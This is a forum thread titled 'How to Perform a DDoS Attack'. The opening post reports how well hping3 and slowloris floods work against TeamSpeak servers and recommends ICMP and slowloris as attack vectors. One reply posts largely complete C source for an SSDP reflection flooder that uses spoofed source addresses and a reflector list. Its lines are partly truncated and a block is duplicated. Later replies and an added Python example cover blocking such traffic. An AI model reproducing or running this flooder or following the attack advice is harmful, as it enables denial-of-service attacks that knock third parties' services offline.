How to Perform a DDoS Attack

shockli

Contributor
Jan 29, 2016
This is being released in the VIP section because I will be using it for IT projects at uni, and will need to be able to verify the authenticity of my papers.

Introduction:
Firstly, let’s start with what a DDoS attack is. It's a Distributed Denial of Service attack. This is a lot different than a DoS attack, which is a Denial of Service attack. The main difference between these two is that a DoS attack is run with a single, usually powerful device, while a DDoS attack is run by many (sometimes very powerful) devices.

Sometimes a DoS or DDoS attack isn't the way to go. To quote the J35T3R while speaking to him on IRC, “I don't really have any powerful resources, I prefer exploits”. You can read up on this guy, there are some questions about if he really did all the attacks he claimed to, but that didn't stop him from becoming Time’s Most Influential Man on the Internet. Please if you do not have the resources to perform an attack do not even try.

Different Types of DDoS & DoS attacks:
[Image: Screenshot-from-2016-02-24-18-49-40.png]


What is the most effective for TeamSpeak:
Environment:

Each command (except the slowloris) was run on 25x throwaway VPSs, each running a 100 Mbit/s line.


Targets:
TeamSpeak 3.0.11.4 servers on other throwaway VPSs running 100 Mbit/s lines.

ICMP:
Program: hping3
Results: Down within seconds.

UDP:
Program: hping3
Results: Slight increase in ping, by 50ms per person.


TCP/HTTP:
Program: hping3
Results: None whatsoever to TeamSpeak.


SYN:
Program: hping3
Results: None whatsoever to TeamSpeak.


SlowLoris:
Note: This was only run from one server and not from 25 as the others.
Program: slowhttptest
Results: Extreme resource usage, but it did not affect TeamSpeak, because TeamSpeak is efficient on resources.

PoD:
Program: hping3
Results: Network usage increase, but not enough to do any proper damage.


Conclusion:
The most efficient attack vector is ICMP. It seems like most servers cannot withstand this kind of attack at all. To protect your server I would recommend disabling ICMP requests if you have problems with people attacking you via ICMP.

I would also recommend using a slowloris attack if you need to do any website DoS'ing. It is extremely efficient and uses barely any resources on the attacker's side.

Note/Edit: It seems I should not have posted the commands on how to do that. It has been added to the R4P3 forum rules, as R4P3 does not encourage attacking anyone. If you would like to know how to do this please contact me on IRC and we can discuss it further to give you access to an uncensored report.

Teaser: I might release a tool that can work very well soon.

Cool Websites to View:
http://map.norsecorp.com/
https://cloudflare.com/
http://shock.ml/
 

JayJax

Active Member
Apr 28, 2015
What about : DNS/NTP/CharGEN/SSDP/SUDP?
and : ESSYN/WIZARD/XAMS/XACK/XSYN?
or : Dominate < for OVH?
 

JayJax

Active Member
Apr 28, 2015
What if? :

Code:
/* everythings dead SSDP.  Oh hi Guys hows R4p3 doing? */

#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 8192
#define PHI 0x9e3779b9
static uint32_t Q[4096], c = 362436;
struct list
{
        struct sockaddr_in data;
        struct list *next;
        struct list *prev;
};
struct list *head;
volatile int tehport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in s$
void init_rand(uint32_t x)
{
        int i;
        Q[0] = x;
        Q[1] = x + PHI;
        Q[2] = x + PHI + PHI;
        for (i = 3; i < 4096; i++)
        {
        Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
        }
}
uint32_t rand_cmwc(void)
{
        uint64_t t, a = 18782LL;
        static uint32_t i = 4095;
        uint32_t x, r = 0xfffffffe;
        i = (i + 1) & 4095;
        t = a * Q[i] + c;
        c = (t >> 32);
        x = t + c;
        if (x < c) {
        x++;
        c++;
        }
        return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int nwords)
{
        unsigned long sum = 0;
        for (sum = 0; nwords > 0; nwords--)
        sum += *buf++;
        sum = (sum >> 16) + (sum & 0xffff);
        sum += (sum >> 16);
        return (unsigned short)(~sum);
}
void setup_ip_header(struct iphdr *iph)
{
        iph->ihl = 5;
        iph->version = 4;
        iph->tos = 0;
        iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 90;
        iph->id = htonl(54321);
        iph->frag_off = 0;
        iph->ttl = MAXTTL;
        iph->protocol = IPPROTO_UDP;
        iph->check = 0;
        iph->saddr = inet_addr("192.168.3.100");
}
void setup_udp_header(struct udphdr *udph)
{
        udph->source = htons(5678);
        udph->dest = htons(1900);
        udph->check = 0;
strcpy((void *)udph + sizeof(struct udphdr), "M-SEARCH * HTTP/1.1\r\nHost:239.2$
        udph->len=htons(sizeof(struct udphdr) + 90);
}
void *flood(void *par1)
{
        struct thread_data *td = (struct thread_data *)par1;
        char datagram[MAX_PACKET_SIZE];
        struct iphdr *iph = (struct iphdr *)datagram;
        struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
        struct sockaddr_in sin = td->sin;
        struct  list *list_node = td->list_node;
        int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
        if(s < 0){
        fprintf(stderr, "Could not open raw socket.\n");
        exit(-1);
        }
        init_rand(time(NULL));
        memset(datagram, 0, MAX_PACKET_SIZE);
        setup_ip_header(iph);
        setup_udp_header(udph);
        udph->source = htons(rand() % 65535 - 1026);
        iph->saddr = sin.sin_addr.s_addr;
        iph->daddr = list_node->data.sin_addr.s_addr;
        iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
        int tmp = 1;
        const int *val = &tmp;
        if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
        fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
        exit(-1);
        }
        init_rand(time(NULL));
        memset(datagram, 0, MAX_PACKET_SIZE);
        setup_ip_header(iph);
        setup_udp_header(udph);
        udph->source = htons(rand() % 65535 - 1026);
        iph->saddr = sin.sin_addr.s_addr;
        iph->daddr = list_node->data.sin_addr.s_addr;
        iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
        int tmp = 1;
        const int *val = &tmp;
        if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
        fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
        exit(-1);
        }
        init_rand(time(NULL));
        register unsigned int i;
        i = 0;
        while(1){
                sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_$
                list_node = list_node->next;
                iph->daddr = list_node->data.sin_addr.s_addr;
                iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
                iph->check = csum ((unsigned short *) datagram, iph->tot_len >>$

                pps++;
                if(i >= limiter)
                {
                        i = 0;
                        usleep(sleeptime);
                }
                i++;
        }
}
int main(int argc, char *argv[ ])
{
        if(argc < 6){
        fprintf(stderr, "Invalid parameters!\n");
        fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> $
                exit(-1);
        }
        srand(time(NULL));
        int i = 0;
        head = NULL;
        fprintf(stdout, "Setting up sockets...\n");
        int max_len = 128;
        char *buffer = (char *) malloc(max_len);
        buffer = memset(buffer, 0x00, max_len);
        int num_threads = atoi(argv[4]);
        int maxpps = atoi(argv[5]);
        limiter = 0;
        pps = 0;
        int multiplier = 20;
        FILE *list_fd = fopen(argv[3],  "r");
        while (fgets(buffer, max_len, list_fd) != NULL) {
                if ((buffer[strlen(buffer) - 1] == '\n') ||
                                (buffer[strlen(buffer) - 1] == '\r')) {
                        buffer[strlen(buffer) - 1] = 0x00;
                        if(head == NULL)
                        {
                                head = (struct list *)malloc(sizeof(struct list$
                                bzero(&head->data, sizeof(head->data));
                                head->data.sin_addr.s_addr=inet_addr(buffer);
                                head->next = head;
                                head->prev = head;
                        } else {
                                struct list *new_node = (struct list *)malloc(s$
                                memset(new_node, 0x00, sizeof(struct list));
                                new_node->data.sin_addr.s_addr=inet_addr(buffer$
                                new_node->prev = head;
                                new_node->next = head->next;
                                head->next = new_node;
                        }
                        i++;
                } else {
                        continue;
                }
        }
        struct list *current = head->next;
        pthread_t thread[num_threads];
        struct sockaddr_in sin;
        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = inet_addr(argv[1]);
        struct thread_data td[num_threads];
        for(i = 0;i<num_threads;i++){
                td[i].thread_id = i;
                td[i].sin= sin;
                td[i].list_node = current;
                pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
        }
        fprintf(stdout, "Starting flood...\n");
        for(i = 0;i<(atoi(argv[6])*multiplier);i++)
        {
                usleep((1000/multiplier)*1000);
                if((pps*multiplier) > maxpps)
                {
                        if(1 > limiter)
                        {
                                sleeptime+=100;
                        } else {
                                limiter--;
                        }
                } else {
                        limiter++;
                        if(sleeptime > 25)
                        {
                                sleeptime-=25;
                        } else {
                                sleeptime = 0;
                        }
                }
                pps = 0;
        }
        return 0;
}
 

JayJax

Active Member
Apr 28, 2015
what will this do? :

 

Haxxthe

Member
Sep 16, 2015
@JayJax
DNS/NTP/CharGEN/SSDP = Blocked by port / payload
ESSYN/WIZARD/XAMS/XACK/XSYN? = People that know what they are doing know how to block this. Essentially blocking all ports / protocols, except services that they use.
Dominate < for OVH? = Old as fuck
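
Added example, not part of the thread or any poster's code: a small Python model of the filtering described in the post above (drop reflected replies by source port, default-deny everything except the services in use), combined with rate-limiting ICMP echo instead of switching it off. The TeamSpeak 3 default ports, the per-source ICMP budget, the packet-record format and the sample traffic are assumptions of this example.

```python
from collections import Counter, defaultdict

# Assumption: TeamSpeak 3 default ports (voice 9987/udp, ServerQuery 10011/tcp,
# file transfer 30033/tcp). Adjust to the services the host really exposes.
ALLOWED = {("udp", 9987), ("tcp", 10011), ("tcp", 30033)}
# UDP source ports that identify replies from the reflector types named in the thread.
REFLECTION_SRC = {53: "DNS", 123: "NTP", 19: "CharGEN", 1900: "SSDP"}
ICMP_ECHO_PER_SEC = 5  # assumed per-source budget for echo requests


def classify(packets):
    """Return a (verdict, reason) pair for each packet, in input order."""
    echo_seen = defaultdict(int)  # (src, whole second) -> echo requests so far
    out = []
    for p in packets:
        if p["proto"] == "icmp":  # sample ICMP records are all echo requests
            key = (p["src"], int(p["ts"]))
            echo_seen[key] += 1
            over = echo_seen[key] > ICMP_ECHO_PER_SEC
            out.append(("drop", "icmp-rate") if over else ("accept", "icmp-ok"))
        # Checked before the allow-list: reflected replies can be aimed at an open port.
        elif p["proto"] == "udp" and p["sport"] in REFLECTION_SRC:
            out.append(("drop", "reflection-" + REFLECTION_SRC[p["sport"]]))
        elif (p["proto"], p["dport"]) in ALLOWED:
            out.append(("accept", "service"))
        else:
            out.append(("drop", "default-deny"))
    return out


def summary(packets):
    """Count drop reasons so an operator can see which vector is active."""
    return Counter(r for verdict, r in classify(packets) if verdict == "drop")


# Constructed sample traffic (documentation address ranges, not real hosts).
SAMPLE = (
    [{"ts": 1.0 + i / 100, "src": "198.51.100.7", "proto": "icmp"} for i in range(8)]
    + [{"ts": 1.2, "src": "203.0.113.9", "proto": "udp", "sport": 1900, "dport": 9987},
       {"ts": 1.3, "src": "203.0.113.10", "proto": "udp", "sport": 123, "dport": 40000},
       {"ts": 1.4, "src": "192.0.2.20", "proto": "udp", "sport": 51000, "dport": 9987},
       {"ts": 1.5, "src": "192.0.2.21", "proto": "tcp", "sport": 51001, "dport": 22}]
)

if __name__ == "__main__":
    for reason, count in summary(SAMPLE).items():
        print(reason, count)
```

The per-reason counts are what to export to monitoring: a jump in one `reflection-*` counter names the vector in use, and `icmp-rate` shows echo floods being shed while ordinary pings still get answered.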
 

JayJax

Active Member
Apr 28, 2015
How about SFTP?
 

Haxxthe

Member
Sep 16, 2015
SFTP is not related to teamspeak. I doubt anyone that is smart enough will be running an ftp server on their teamspeak server.

What about reflection attacks? It works with any short packet that sends back another, larger packet.
 

Qraktzyl

Retired Staff
Contributor
Nov 2, 2015
sFTP works on SSH port (22). Just want to remove the confusion, you shouldn't be using FTP anymore if you're on a linux box and need to transfer files...
"
FTP, or "File Transfer Protocol" is a popular method of transferring files between two remote systems.

SFTP, which stands for SSH File Transfer Protocol, or Secure File Transfer Protocol, is a separate protocol packaged with SSH that works in a similar way over a secure connection. The advantage is the ability to leverage a secure connection to transfer files and traverse the filesystem on both the local and remote system."
 

shockli

Contributor
Jan 29, 2016
Oh yes I forgot that. SCP is also always the way to go with transferring files. :)
 